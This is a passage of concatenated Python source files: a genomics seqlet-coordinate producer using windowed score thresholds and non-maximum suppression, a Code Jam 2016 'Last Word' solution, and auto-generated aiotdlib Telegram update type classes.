                         for x in precisiontransformed_score_track],
            pos_threshold=tnt_results.transformed_pos_threshold,
            neg_threshold=tnt_results.transformed_neg_threshold,
            window_size=max(self.sliding),
            flank=self.flank,
            suppress=self.suppress,
            max_seqlets_total=self.max_seqlets_total,
            verbose=self.verbose,
            other_info_tracks={'best_window_idx':
                [x[left_padding_to_remove:-right_padding_to_remove] for x in
                 precisiontransformed_bestwindowsizeidxs]})
        VariableWindowAroundChunks.count += 1
        return CoordProducerResults(
                coords=coords,
                tnt_results=tnt_results)
#identify_coords is expecting something that has already been processed
# with sliding windows of size window_size
def identify_coords(score_track, pos_threshold, neg_threshold,
                    window_size, flank, suppress,
                    max_seqlets_total, verbose, other_info_tracks=None):
    """Identify seqlet coordinates by greedy non-maximum suppression.

    Positions whose window-sum passes pos_threshold (>=) or
    neg_threshold (<=) are candidates; peaks are picked in order of
    decreasing |score|, each suppressing further candidates within
    +/- suppress positions, and each expanded by flank on both sides.

    :param score_track: list of 1d arrays of window sums, one per example
    :param pos_threshold: minimum score for positive candidates
    :param neg_threshold: maximum score for negative candidates
    :param window_size: sliding-window size used to build score_track
    :param flank: expansion added on both sides of each peak
    :param suppress: half-width of the suppression region around a peak
    :param max_seqlets_total: if not None, keep only the top-|score| coords
    :param verbose: whether to print progress information
    :param other_info_tracks: dict of name -> per-example tracks (same
        shapes as score_track); the value at each peak is attached to the
        coord's other_info. Defaults to an empty dict.
    :return: list of SeqletCoordsFWAP
    """
    # BUGFIX: default was a shared mutable `{}` literal; it is never
    # mutated here, but a mutable default argument is a standing hazard.
    if (other_info_tracks is None):
        other_info_tracks = {}
    for other_info_track in other_info_tracks.values():
        assert all([x.shape==y.shape for x,y
                    in zip(other_info_track,score_track)])
    #cp_score_track = 'copy' of the score track, which can be modified as
    # coordinates are identified
    cp_score_track = [np.array(x) for x in score_track]
    #if a position is less than the threshold, set it to -np.inf
    #Note that the threshold comparisons need to be >= and not just > for
    # cases where there are lots of ties at the high end (e.g. with an IR
    # tranformation that gives a lot of values that have a precision of 1.0)
    cp_score_track = [
        np.array([np.abs(y) if (y >= pos_threshold
                        or y <= neg_threshold)
                       else -np.inf for y in x])
        for x in cp_score_track]
    coords = []
    for example_idx,single_score_track in enumerate(cp_score_track):
        #set the stuff near the flanks to -np.inf so that we
        # don't pick it up during argmax
        single_score_track[0:flank] = -np.inf
        single_score_track[len(single_score_track)-(flank):
                           len(single_score_track)] = -np.inf
        while True:
            argmax = np.argmax(single_score_track,axis=0)
            max_val = single_score_track[argmax]
            #bail if exhausted everything that passed the threshold
            #and was not suppressed
            if (max_val == -np.inf):
                break
            #need to be able to expand without going off the edge
            if ((argmax >= flank) and
                (argmax < (len(single_score_track)-flank))):
                coord = SeqletCoordsFWAP(
                    example_idx=example_idx,
                    start=argmax-flank,
                    end=argmax+window_size+flank,
                    score=score_track[example_idx][argmax],
                    other_info = dict([
                     (track_name, track[example_idx][argmax])
                     for (track_name, track) in other_info_tracks.items()]))
                assert (coord.score >= pos_threshold
                        or coord.score <= neg_threshold)
                coords.append(coord)
            else:
                assert False,\
                 ("This shouldn't happen because I set stuff near the"
                  "border to -np.inf early on")
            #suppress the chunks within +- suppress
            left_supp_idx = int(max(np.floor(argmax+0.5-suppress),0))
            right_supp_idx = int(min(np.ceil(argmax+0.5+suppress),
                                 len(single_score_track)))
            single_score_track[left_supp_idx:right_supp_idx] = -np.inf
    if (verbose):
        print("Got "+str(len(coords))+" coords")
        sys.stdout.flush()
    if ((max_seqlets_total is not None) and
        len(coords) > max_seqlets_total):
        if (verbose):
            print("Limiting to top "+str(max_seqlets_total))
            sys.stdout.flush()
        coords = sorted(coords, key=lambda x: -np.abs(x.score))\
                               [:max_seqlets_total]
    return coords
def refine_thresholds_based_on_frac_passing(
        vals, pos_threshold, neg_threshold,
        min_passing_windows_frac, max_passing_windows_frac,
        separate_pos_neg_thresholds, verbose):
    """Clamp thresholds so the fraction of windows passing them stays in
    [min_passing_windows_frac, max_passing_windows_frac].

    When the passing fraction falls outside the allowed band, the
    thresholds are replaced by quantiles of `vals` (or of the positive
    and negative values separately, when separate_pos_neg_thresholds)
    that admit exactly the boundary fraction of windows.

    :param vals: array of window scores
    :param pos_threshold: initial positive-side threshold (pass if >=)
    :param neg_threshold: initial negative-side threshold (pass if <=)
    :param min_passing_windows_frac: lower bound on the passing fraction
    :param max_passing_windows_frac: upper bound on the passing fraction
    :param separate_pos_neg_thresholds: quantile the two signs separately
    :param verbose: print diagnostic information
    :return: (pos_threshold, neg_threshold) after any adjustment
    """
    num_passing = sum(vals >= pos_threshold) + sum(vals <= neg_threshold)
    frac_passing_windows = num_passing/float(len(vals))
    if (verbose):
        print("Thresholds from null dist were",
              neg_threshold," and ",pos_threshold,
              "with frac passing", frac_passing_windows)
    # Partition by sign; substitute [0] for an empty side so that
    # np.percentile always has data to work with.
    positives = [v for v in vals if v >= 0] or [0]
    negatives = [v for v in vals if v < 0] or [0]

    def thresholds_at_frac(frac):
        # Quantile-based thresholds that would pass `frac` of the windows.
        if (separate_pos_neg_thresholds):
            new_pos = np.percentile(a=positives, q=100*(1-frac))
            new_neg = np.percentile(a=negatives, q=100*(frac))
        else:
            new_pos = np.percentile(a=np.abs(vals), q=100*(1-frac))
            new_neg = -new_pos
        return new_pos, new_neg

    if (frac_passing_windows < min_passing_windows_frac):
        if (verbose):
            print("Passing windows frac was",
                  frac_passing_windows,", which is below ",
                  min_passing_windows_frac,"; adjusting")
        pos_threshold, neg_threshold =\
            thresholds_at_frac(min_passing_windows_frac)
    if (frac_passing_windows > max_passing_windows_frac):
        if (verbose):
            print("Passing windows frac was",
                  frac_passing_windows,", which is above ",
                  max_passing_windows_frac,"; adjusting")
        pos_threshold, neg_threshold =\
            thresholds_at_frac(max_passing_windows_frac)
    if (verbose):
        print("New thresholds are",pos_threshold,"and",neg_threshold)
    return pos_threshold, neg_threshold
def make_nulldist_figure(orig_vals, null_vals, pos_ir, neg_ir,
                         pos_threshold, neg_threshold):
    """Plot foreground/null score histograms with the estimated
    foreground-precision curve overlaid (plus threshold lines, if given).

    :param orig_vals: foreground scores (sorted internally for plotting)
    :param null_vals: null/background scores
    :param pos_ir: classifier for non-negative scores (has .transform)
    :param neg_ir: classifier for negative scores; may be None
    :param pos_threshold: x position of the positive cutoff line; may be None
    :param neg_threshold: x position of the negative cutoff line; may be None
    """
    from matplotlib import pyplot as plt
    fig,ax1 = plt.subplots()
    orig_vals = np.array(sorted(orig_vals))
    # Overlaid densities: blue = foreground, orange = null (see ylabel)
    ax1.hist(orig_vals, bins=100, density=True, alpha=0.5)
    ax1.hist(null_vals, bins=100, density=True, alpha=0.5)
    ax1.set_ylabel("Probability density\n(blue=foreground, orange=null)")
    ax1.set_xlabel("Total importance in window")
    # Precision curve: elementwise max of the positive- and
    # negative-side classifiers over the sorted foreground scores
    precisions = pos_ir.transform(orig_vals)
    if (neg_ir is not None):
        precisions = np.maximum(precisions, neg_ir.transform(orig_vals))
    ax2 = ax1.twinx()
    ax2.plot(orig_vals, precisions)
    # Vertical red lines mark the chosen cutoffs, when provided
    if (pos_threshold is not None):
        ax2.plot([pos_threshold, pos_threshold], [0.0, 1.0], color="red")
    if (neg_threshold is not None):
        ax2.plot([neg_threshold, neg_threshold], [0.0, 1.0], color="red")
    ax2.set_ylabel("Estimated foreground precision")
    ax2.set_ylim(0.0, 1.02)
class FixedWindowAroundChunks(AbstractCoordProducer):
    """Coordinate producer using a single sliding-window size: window
    sums are thresholded at a score cutoff chosen to hit target_fdr
    (estimated via isotonic regression against a null distribution), and
    passing positions become seqlet coordinates after non-max
    suppression. Compare VariableWindowAroundChunks, which scans
    multiple window sizes.
    """
    count = 0  # class-level counter used to give saved figure files unique names

    def __init__(self, sliding,
                       flank,
                       suppress, #flanks to suppress
                       target_fdr,
                       min_passing_windows_frac,
                       max_passing_windows_frac,
                       separate_pos_neg_thresholds=False,
                       max_seqlets_total=None,
                       progress_update=5000,
                       verbose=True,
                       plot_save_dir="figures"):
        """
        :param sliding: sliding-window size
        :param flank: number of positions to expand around each window
        :param suppress: half-width of the non-max-suppression region
        :param target_fdr: target false discovery rate for the threshold
        :param min_passing_windows_frac: lower bound on the fraction of
            windows allowed to pass the threshold
        :param max_passing_windows_frac: upper bound on the fraction of
            windows allowed to pass the threshold
        :param separate_pos_neg_thresholds: whether positive and negative
            scores are thresholded separately, defaults to False
        :param max_seqlets_total: if not None, keep only the top-|score|
            max_seqlets_total coordinates, defaults to None
        :param progress_update: granularity of progress reporting
        :param verbose: whether to print progress information
        :param plot_save_dir: directory where diagnostic figures are saved
        """
        self.sliding = sliding
        self.flank = flank
        self.suppress = suppress
        self.target_fdr = target_fdr
        assert max_passing_windows_frac >= min_passing_windows_frac
        self.min_passing_windows_frac = min_passing_windows_frac
        self.max_passing_windows_frac = max_passing_windows_frac
        self.separate_pos_neg_thresholds = separate_pos_neg_thresholds
        # BUGFIX: this was previously hard-coded to None, silently
        # discarding the constructor argument (and making save_hdf5
        # never write the attribute, so from_hdf5 could never restore it).
        self.max_seqlets_total = max_seqlets_total
        self.progress_update = progress_update
        self.verbose = verbose
        self.plot_save_dir = plot_save_dir

    @classmethod
    def from_hdf5(cls, grp):
        """Reconstruct an instance from an hdf5 group written by save_hdf5."""
        sliding = grp.attrs["sliding"]
        flank = grp.attrs["flank"]
        suppress = grp.attrs["suppress"]
        target_fdr = grp.attrs["target_fdr"]
        min_passing_windows_frac = grp.attrs["min_passing_windows_frac"]
        max_passing_windows_frac = grp.attrs["max_passing_windows_frac"]
        separate_pos_neg_thresholds = grp.attrs["separate_pos_neg_thresholds"]
        # max_seqlets_total is optional in older saves
        if ("max_seqlets_total" in grp.attrs):
            max_seqlets_total = grp.attrs["max_seqlets_total"]
        else:
            max_seqlets_total = None
        progress_update = grp.attrs["progress_update"]
        verbose = grp.attrs["verbose"]
        return cls(sliding=sliding, flank=flank, suppress=suppress,
                    target_fdr=target_fdr,
                    min_passing_windows_frac=min_passing_windows_frac,
                    max_passing_windows_frac=max_passing_windows_frac,
                    separate_pos_neg_thresholds=separate_pos_neg_thresholds,
                    max_seqlets_total=max_seqlets_total,
                    progress_update=progress_update, verbose=verbose)

    def save_hdf5(self, grp):
        """Serialize the configuration (not any fitted state) to hdf5."""
        grp.attrs["class"] = type(self).__name__
        grp.attrs["sliding"] = self.sliding
        grp.attrs["flank"] = self.flank
        grp.attrs["suppress"] = self.suppress
        grp.attrs["target_fdr"] = self.target_fdr
        grp.attrs["min_passing_windows_frac"] = self.min_passing_windows_frac
        grp.attrs["max_passing_windows_frac"] = self.max_passing_windows_frac
        grp.attrs["separate_pos_neg_thresholds"] =\
            self.separate_pos_neg_thresholds
        if (self.max_seqlets_total is not None):
            grp.attrs["max_seqlets_total"] = self.max_seqlets_total
        grp.attrs["progress_update"] = self.progress_update
        grp.attrs["verbose"] = self.verbose

    def __call__(self, score_track, null_track, tnt_results=None):
        """Produce seqlet coordinates from score_track.

        If tnt_results is None, thresholds and the value transformer are
        fit from the data against a null distribution; otherwise the
        supplied tnt_results is reused.
        """
        # score_track now can be a list of arrays,
        assert all([len(x.shape)==1 for x in score_track])
        window_sum_function = get_simple_window_sum_function(self.sliding)
        if (self.verbose):
            print("Computing windowed sums on original")
            sys.stdout.flush()
        original_summed_score_track = window_sum_function(arrs=score_track)
        #Determine the window thresholds
        if (tnt_results is None):
            if (self.verbose):
                print("Generating null dist")
                sys.stdout.flush()
            null_vals = get_null_vals(
                null_track=null_track,
                score_track=score_track,
                window_size=self.sliding,
                original_summed_score_track=original_summed_score_track)
            if (self.verbose):
                print("Computing threshold")
                sys.stdout.flush()
            orig_vals = list(
                np.concatenate(original_summed_score_track, axis=0))
            #Note that orig_vals may have been subsampled at this point
            pos_ir, neg_ir, subsampled_orig_vals, subsampled_null_vals =\
                get_isotonic_regression_classifier(
                    orig_vals=orig_vals,
                    null_vals=null_vals)
            subsampled_pos_orig_vals = (
                np.array(sorted([x for x in subsampled_orig_vals if x >= 0])))
            subsampled_neg_orig_vals = (
                np.array(sorted([x for x in subsampled_orig_vals if x < 0],
                                key=lambda x: abs(x))))
            subsampled_pos_val_precisions =\
                pos_ir.transform(subsampled_pos_orig_vals)
            if (len(subsampled_neg_orig_vals) > 0):
                subsampled_neg_val_precisions =\
                    neg_ir.transform(subsampled_neg_orig_vals)
            # Smallest score whose estimated precision reaches
            # (1 - target_fdr); the appended final element is a
            # fallback when no score qualifies.
            pos_threshold = ([x[1] for x in
                zip(subsampled_pos_val_precisions,
                    subsampled_pos_orig_vals) if x[0]
                >= (1-self.target_fdr)]+[subsampled_pos_orig_vals[-1]])[0]
            if (len(subsampled_neg_orig_vals) > 0):
                neg_threshold = ([x[1] for x in
                    zip(subsampled_neg_val_precisions,
                        subsampled_neg_orig_vals) if x[0]
                    >= (1-self.target_fdr)]+[subsampled_neg_orig_vals[-1]])[0]
            else:
                neg_threshold = -np.inf
            pos_threshold, neg_threshold =\
                refine_thresholds_based_on_frac_passing(
                    vals=subsampled_orig_vals,
                    pos_threshold=pos_threshold,
                    neg_threshold=neg_threshold,
                    min_passing_windows_frac=self.min_passing_windows_frac,
                    max_passing_windows_frac=self.max_passing_windows_frac,
                    separate_pos_neg_thresholds=self.separate_pos_neg_thresholds,
                    verbose=self.verbose)
            if (self.separate_pos_neg_thresholds):
                val_transformer = SignedPercentileValTransformer(
                                    distribution=orig_vals)
            else:
                val_transformer = AbsPercentileValTransformer(
                                    distribution=orig_vals)
            if (self.verbose):
                print("Final raw thresholds are",
                      neg_threshold," and ",pos_threshold)
                print("Final transformed thresholds are",
                      val_transformer(neg_threshold)," and ",
                      val_transformer(pos_threshold))
            make_nulldist_figure(orig_vals=subsampled_orig_vals,
                                 null_vals=subsampled_null_vals,
                                 pos_ir=pos_ir, neg_ir=neg_ir,
                                 pos_threshold=pos_threshold,
                                 neg_threshold=neg_threshold)
            util.show_or_savefig(plot_save_dir=self.plot_save_dir,
                                 filename="scoredist_"
                                          +str(FixedWindowAroundChunks.count)
                                          +".png")
            FixedWindowAroundChunks.count += 1
            tnt_results = FWACTransformAndThresholdResults(
                            neg_threshold=neg_threshold,
                            transformed_neg_threshold=val_transformer(neg_threshold),
                            pos_threshold=pos_threshold,
                            transformed_pos_threshold=val_transformer(pos_threshold),
                            val_transformer=val_transformer)
        coords = identify_coords(
            score_track=original_summed_score_track,
            pos_threshold=tnt_results.pos_threshold,
            neg_threshold=tnt_results.neg_threshold,
            window_size=self.sliding,
            flank=self.flank,
            suppress=self.suppress,
            max_seqlets_total=self.max_seqlets_total,
            verbose=self.verbose)
        return CoordProducerResults(
                coords=coords,
                tnt_results=tnt_results)
| 1.773438 | 2 |
Google Jam/2016/lastword.py | djphan/Prog-Problems | 0 | 17676 | import sys
def lastWord(inputString):
    """Return the lexicographically largest "last word" obtainable by
    taking the characters of inputString in order and, at each step,
    either prepending or appending the character to the word built so
    far (Google Code Jam 2016 Qualification, "The Last Word").

    Greedy: keep whichever of the two candidate placements compares
    larger at each step.

    :param inputString: non-empty string of characters to place
    :return: the largest achievable final word
    """
    outputString = inputString[0]
    for ch in inputString[1:]:
        # max() of the two placements replaces the original
        # sorted(...)[1] idiom; the unused 'results' local is dropped.
        outputString = max(outputString + ch, ch + outputString)
    return outputString
# Driver loop: the first input line gives the number of test cases;
# each subsequent line is one input string. Answers are printed in
# "Case #<i>: <result>" format (Code Jam-style judge output).
numTests = input()
for i in range (0, int(numTests)):
    print ("Case #" + str(i+1) +": " + str(lastWord(input())))
| 3.5625 | 4 |
aiotdlib/api/types/update.py | pylakey/pytdlib | 37 | 17677 | # =============================================================================== #
# #
# This file has been generated automatically!! Do not change this manually! #
# #
# =============================================================================== #
from __future__ import annotations
import typing
from pydantic import Field
from .address import Address
from .authorization_state import AuthorizationState
from .background import Background
from .basic_group import BasicGroup
from .basic_group_full_info import BasicGroupFullInfo
from .call import Call
from .callback_query_payload import CallbackQueryPayload
from .chat import Chat
from .chat_action import ChatAction
from .chat_action_bar import ChatActionBar
from .chat_filter_info import ChatFilterInfo
from .chat_invite_link import ChatInviteLink
from .chat_join_request import ChatJoinRequest
from .chat_join_requests_info import ChatJoinRequestsInfo
from .chat_list import ChatList
from .chat_member import ChatMember
from .chat_nearby import ChatNearby
from .chat_notification_settings import ChatNotificationSettings
from .chat_permissions import ChatPermissions
from .chat_photo_info import ChatPhotoInfo
from .chat_position import ChatPosition
from .chat_theme import ChatTheme
from .chat_type import ChatType
from .connection_state import ConnectionState
from .draft_message import DraftMessage
from .file import File
from .group_call import GroupCall
from .group_call_participant import GroupCallParticipant
from .language_pack_string import LanguagePackString
from .location import Location
from .message import Message
from .message_content import MessageContent
from .message_interaction_info import MessageInteractionInfo
from .message_sender import MessageSender
from .notification import Notification
from .notification_group import NotificationGroup
from .notification_group_type import NotificationGroupType
from .notification_settings_scope import NotificationSettingsScope
from .option_value import OptionValue
from .order_info import OrderInfo
from .poll import Poll
from .reply_markup import ReplyMarkup
from .scope_notification_settings import ScopeNotificationSettings
from .secret_chat import SecretChat
from .sticker import Sticker
from .sticker_set import StickerSet
from .sticker_sets import StickerSets
from .suggested_action import SuggestedAction
from .supergroup import Supergroup
from .supergroup_full_info import SupergroupFullInfo
from .terms_of_service import TermsOfService
from .user import User
from .user_full_info import UserFullInfo
from .user_privacy_setting import UserPrivacySetting
from .user_privacy_setting_rules import UserPrivacySettingRules
from .user_status import UserStatus
from .video_chat import VideoChat
from ..base_object import BaseObject
class Update(BaseObject):
    """
    Contains notifications about data changes
    """
    # TDLib type discriminator; populated from the "@type" key of
    # incoming JSON objects via the pydantic field alias.
    ID: str = Field("update", alias="@type")
class UpdateActiveNotifications(Update):
    """
    Contains active notifications that was shown on previous application launches. This update is sent only if the message database is used. In that case it comes once before any updateNotification and updateNotificationGroup update
    :param groups: Lists of active notification groups
    :type groups: :class:`list[NotificationGroup]`
    """
    ID: str = Field("updateActiveNotifications", alias="@type")
    groups: list[NotificationGroup]
    @staticmethod
    def read(q: dict) -> UpdateActiveNotifications:
        # construct() skips pydantic validation; presumably fine because
        # TDLib payloads already match this auto-generated schema.
        return UpdateActiveNotifications.construct(**q)
class UpdateAnimatedEmojiMessageClicked(Update):
    """
    Some animated emoji message was clicked and a big animated sticker must be played if the message is visible on the screen. chatActionWatchingAnimations with the text of the message needs to be sent if the sticker is played
    :param chat_id: Chat identifier
    :type chat_id: :class:`int`
    :param message_id: Message identifier
    :type message_id: :class:`int`
    :param sticker: The animated sticker to be played
    :type sticker: :class:`Sticker`
    """
    ID: str = Field("updateAnimatedEmojiMessageClicked", alias="@type")
    chat_id: int
    message_id: int
    sticker: Sticker
    @staticmethod
    def read(q: dict) -> UpdateAnimatedEmojiMessageClicked:
        # construct() skips pydantic validation; presumably fine because
        # TDLib payloads already match this auto-generated schema.
        return UpdateAnimatedEmojiMessageClicked.construct(**q)
class UpdateAnimationSearchParameters(Update):
    """
    The parameters of animation search through GetOption("animation_search_bot_username") bot has changed
    :param provider: Name of the animation search provider
    :type provider: :class:`str`
    :param emojis: The new list of emojis suggested for searching
    :type emojis: :class:`list[str]`
    """
    ID: str = Field("updateAnimationSearchParameters", alias="@type")
    provider: str
    emojis: list[str]
    @staticmethod
    def read(q: dict) -> UpdateAnimationSearchParameters:
        # construct() skips pydantic validation; presumably fine because
        # TDLib payloads already match this auto-generated schema.
        return UpdateAnimationSearchParameters.construct(**q)
class UpdateAuthorizationState(Update):
    """
    The user authorization state has changed
    :param authorization_state: New authorization state
    :type authorization_state: :class:`AuthorizationState`
    """
    ID: str = Field("updateAuthorizationState", alias="@type")
    authorization_state: AuthorizationState
    @staticmethod
    def read(q: dict) -> UpdateAuthorizationState:
        # construct() skips pydantic validation; presumably fine because
        # TDLib payloads already match this auto-generated schema.
        return UpdateAuthorizationState.construct(**q)
class UpdateBasicGroup(Update):
    """
    Some data of a basic group has changed. This update is guaranteed to come before the basic group identifier is returned to the application
    :param basic_group: New data about the group
    :type basic_group: :class:`BasicGroup`
    """
    ID: str = Field("updateBasicGroup", alias="@type")
    basic_group: BasicGroup
    @staticmethod
    def read(q: dict) -> UpdateBasicGroup:
        # construct() skips pydantic validation; presumably fine because
        # TDLib payloads already match this auto-generated schema.
        return UpdateBasicGroup.construct(**q)
class UpdateBasicGroupFullInfo(Update):
    """
    Some data in basicGroupFullInfo has been changed
    :param basic_group_id: Identifier of a basic group
    :type basic_group_id: :class:`int`
    :param basic_group_full_info: New full information about the group
    :type basic_group_full_info: :class:`BasicGroupFullInfo`
    """
    ID: str = Field("updateBasicGroupFullInfo", alias="@type")
    basic_group_id: int
    basic_group_full_info: BasicGroupFullInfo
    @staticmethod
    def read(q: dict) -> UpdateBasicGroupFullInfo:
        # construct() skips pydantic validation; presumably fine because
        # TDLib payloads already match this auto-generated schema.
        return UpdateBasicGroupFullInfo.construct(**q)
class UpdateCall(Update):
    """
    New call was created or information about a call was updated
    :param call: New data about a call
    :type call: :class:`Call`
    """
    ID: str = Field("updateCall", alias="@type")
    call: Call
    @staticmethod
    def read(q: dict) -> UpdateCall:
        # construct() skips pydantic validation; presumably fine because
        # TDLib payloads already match this auto-generated schema.
        return UpdateCall.construct(**q)
class UpdateChatAction(Update):
    """
    A message sender activity in the chat has changed
    :param chat_id: Chat identifier
    :type chat_id: :class:`int`
    :param message_thread_id: If not 0, a message thread identifier in which the action was performed
    :type message_thread_id: :class:`int`
    :param sender_id: Identifier of a message sender performing the action
    :type sender_id: :class:`MessageSender`
    :param action: The action
    :type action: :class:`ChatAction`
    """
    ID: str = Field("updateChatAction", alias="@type")
    chat_id: int
    message_thread_id: int
    sender_id: MessageSender
    action: ChatAction
    @staticmethod
    def read(q: dict) -> UpdateChatAction:
        # construct() skips pydantic validation; presumably fine because
        # TDLib payloads already match this auto-generated schema.
        return UpdateChatAction.construct(**q)
class UpdateChatActionBar(Update):
    """
    The chat action bar was changed
    :param chat_id: Chat identifier
    :type chat_id: :class:`int`
    :param action_bar: The new value of the action bar; may be null, defaults to None
    :type action_bar: :class:`ChatActionBar`, optional
    """
    ID: str = Field("updateChatActionBar", alias="@type")
    chat_id: int
    action_bar: typing.Optional[ChatActionBar] = None
    @staticmethod
    def read(q: dict) -> UpdateChatActionBar:
        # construct() skips pydantic validation; presumably fine because
        # TDLib payloads already match this auto-generated schema.
        return UpdateChatActionBar.construct(**q)
class UpdateChatDefaultDisableNotification(Update):
    """
    The value of the default disable_notification parameter, used when a message is sent to the chat, was changed
    :param chat_id: Chat identifier
    :type chat_id: :class:`int`
    :param default_disable_notification: The new default_disable_notification value
    :type default_disable_notification: :class:`bool`
    """
    ID: str = Field("updateChatDefaultDisableNotification", alias="@type")
    chat_id: int
    default_disable_notification: bool
    @staticmethod
    def read(q: dict) -> UpdateChatDefaultDisableNotification:
        # construct() skips pydantic validation; presumably fine because
        # TDLib payloads already match this auto-generated schema.
        return UpdateChatDefaultDisableNotification.construct(**q)
class UpdateChatDraftMessage(Update):
    """
    A chat draft has changed. Be aware that the update may come in the currently opened chat but with old content of the draft. If the user has changed the content of the draft, this update mustn't be applied
    :param chat_id: Chat identifier
    :type chat_id: :class:`int`
    :param draft_message: The new draft message; may be null, defaults to None
    :type draft_message: :class:`DraftMessage`, optional
    :param positions: The new chat positions in the chat lists
    :type positions: :class:`list[ChatPosition]`
    """
    ID: str = Field("updateChatDraftMessage", alias="@type")
    chat_id: int
    draft_message: typing.Optional[DraftMessage] = None
    positions: list[ChatPosition]
    @staticmethod
    def read(q: dict) -> UpdateChatDraftMessage:
        # construct() skips pydantic validation; presumably fine because
        # TDLib payloads already match this auto-generated schema.
        return UpdateChatDraftMessage.construct(**q)
class UpdateChatFilters(Update):
    """
    The list of chat filters or a chat filter has changed
    :param chat_filters: The new list of chat filters
    :type chat_filters: :class:`list[ChatFilterInfo]`
    """
    ID: str = Field("updateChatFilters", alias="@type")
    chat_filters: list[ChatFilterInfo]
    @staticmethod
    def read(q: dict) -> UpdateChatFilters:
        # construct() skips pydantic validation; presumably fine because
        # TDLib payloads already match this auto-generated schema.
        return UpdateChatFilters.construct(**q)
class UpdateChatHasProtectedContent(Update):
    """
    A chat content was allowed or restricted for saving
    :param chat_id: Chat identifier
    :type chat_id: :class:`int`
    :param has_protected_content: New value of has_protected_content
    :type has_protected_content: :class:`bool`
    """
    ID: str = Field("updateChatHasProtectedContent", alias="@type")
    chat_id: int
    has_protected_content: bool
    @staticmethod
    def read(q: dict) -> UpdateChatHasProtectedContent:
        # construct() skips pydantic validation; presumably fine because
        # TDLib payloads already match this auto-generated schema.
        return UpdateChatHasProtectedContent.construct(**q)
class UpdateChatHasScheduledMessages(Update):
    """
    A chat's has_scheduled_messages field has changed
    :param chat_id: Chat identifier
    :type chat_id: :class:`int`
    :param has_scheduled_messages: New value of has_scheduled_messages
    :type has_scheduled_messages: :class:`bool`
    """
    ID: str = Field("updateChatHasScheduledMessages", alias="@type")
    chat_id: int
    has_scheduled_messages: bool
    @staticmethod
    def read(q: dict) -> UpdateChatHasScheduledMessages:
        # construct() skips pydantic validation; presumably fine because
        # TDLib payloads already match this auto-generated schema.
        return UpdateChatHasScheduledMessages.construct(**q)
class UpdateChatIsBlocked(Update):
    """
    A chat was blocked or unblocked
    :param chat_id: Chat identifier
    :type chat_id: :class:`int`
    :param is_blocked: New value of is_blocked
    :type is_blocked: :class:`bool`
    """
    ID: str = Field("updateChatIsBlocked", alias="@type")
    chat_id: int
    is_blocked: bool
    @staticmethod
    def read(q: dict) -> UpdateChatIsBlocked:
        # construct() skips pydantic validation; presumably fine because
        # TDLib payloads already match this auto-generated schema.
        return UpdateChatIsBlocked.construct(**q)
class UpdateChatIsMarkedAsUnread(Update):
    """
    A chat was marked as unread or was read
    :param chat_id: Chat identifier
    :type chat_id: :class:`int`
    :param is_marked_as_unread: New value of is_marked_as_unread
    :type is_marked_as_unread: :class:`bool`
    """
    ID: str = Field("updateChatIsMarkedAsUnread", alias="@type")
    chat_id: int
    is_marked_as_unread: bool
    @staticmethod
    def read(q: dict) -> UpdateChatIsMarkedAsUnread:
        # construct() skips pydantic validation; presumably fine because
        # TDLib payloads already match this auto-generated schema.
        return UpdateChatIsMarkedAsUnread.construct(**q)
class UpdateChatLastMessage(Update):
    """
    The last message of a chat was changed. If last_message is null, then the last message in the chat became unknown. Some new unknown messages might be added to the chat in this case
    :param chat_id: Chat identifier
    :type chat_id: :class:`int`
    :param last_message: The new last message in the chat; may be null, defaults to None
    :type last_message: :class:`Message`, optional
    :param positions: The new chat positions in the chat lists
    :type positions: :class:`list[ChatPosition]`
    """
    ID: str = Field("updateChatLastMessage", alias="@type")
    chat_id: int
    last_message: typing.Optional[Message] = None
    positions: list[ChatPosition]
    @staticmethod
    def read(q: dict) -> UpdateChatLastMessage:
        # construct() skips pydantic validation; presumably fine because
        # TDLib payloads already match this auto-generated schema.
        return UpdateChatLastMessage.construct(**q)
class UpdateChatMember(Update):
    """
    User rights changed in a chat; for bots only
    :param chat_id: Chat identifier
    :type chat_id: :class:`int`
    :param actor_user_id: Identifier of the user, changing the rights
    :type actor_user_id: :class:`int`
    :param date: Point in time (Unix timestamp) when the user rights was changed
    :type date: :class:`int`
    :param invite_link: If user has joined the chat using an invite link, the invite link; may be null, defaults to None
    :type invite_link: :class:`ChatInviteLink`, optional
    :param old_chat_member: Previous chat member
    :type old_chat_member: :class:`ChatMember`
    :param new_chat_member: New chat member
    :type new_chat_member: :class:`ChatMember`
    """
    ID: str = Field("updateChatMember", alias="@type")
    chat_id: int
    actor_user_id: int
    date: int
    invite_link: typing.Optional[ChatInviteLink] = None
    old_chat_member: ChatMember
    new_chat_member: ChatMember
    @staticmethod
    def read(q: dict) -> UpdateChatMember:
        # construct() skips pydantic validation; presumably fine because
        # TDLib payloads already match this auto-generated schema.
        return UpdateChatMember.construct(**q)
class UpdateChatMessageSender(Update):
    """
    The message sender that is selected to send messages in a chat has changed

    :param chat_id: Chat identifier
    :type chat_id: :class:`int`

    :param message_sender_id: New value of message_sender_id; may be null if the user can't change message sender, defaults to None
    :type message_sender_id: :class:`MessageSender`, optional

    """

    ID: str = Field("updateChatMessageSender", alias="@type")
    chat_id: int
    message_sender_id: typing.Optional[MessageSender] = None

    @staticmethod
    def read(q: dict) -> UpdateChatMessageSender:
        """Build an :class:`UpdateChatMessageSender` from the raw update dict *q*."""
        return UpdateChatMessageSender.construct(**q)
class UpdateChatMessageTtl(Update):
    """
    The message Time To Live setting for a chat was changed

    :param chat_id: Chat identifier
    :type chat_id: :class:`int`

    :param message_ttl: New value of message_ttl
    :type message_ttl: :class:`int`

    """

    ID: str = Field("updateChatMessageTtl", alias="@type")
    chat_id: int
    message_ttl: int

    @staticmethod
    def read(q: dict) -> UpdateChatMessageTtl:
        """Build an :class:`UpdateChatMessageTtl` from the raw update dict *q*."""
        return UpdateChatMessageTtl.construct(**q)
class UpdateChatNotificationSettings(Update):
    """
    Notification settings for a chat were changed

    :param chat_id: Chat identifier
    :type chat_id: :class:`int`

    :param notification_settings: The new notification settings
    :type notification_settings: :class:`ChatNotificationSettings`

    """

    ID: str = Field("updateChatNotificationSettings", alias="@type")
    chat_id: int
    notification_settings: ChatNotificationSettings

    @staticmethod
    def read(q: dict) -> UpdateChatNotificationSettings:
        """Build an :class:`UpdateChatNotificationSettings` from the raw update dict *q*."""
        return UpdateChatNotificationSettings.construct(**q)
class UpdateChatOnlineMemberCount(Update):
    """
    The number of online group members has changed. This update with non-zero count is sent only for currently opened chats. There is no guarantee that it will be sent just after the count has changed

    :param chat_id: Identifier of the chat
    :type chat_id: :class:`int`

    :param online_member_count: New number of online members in the chat, or 0 if unknown
    :type online_member_count: :class:`int`

    """

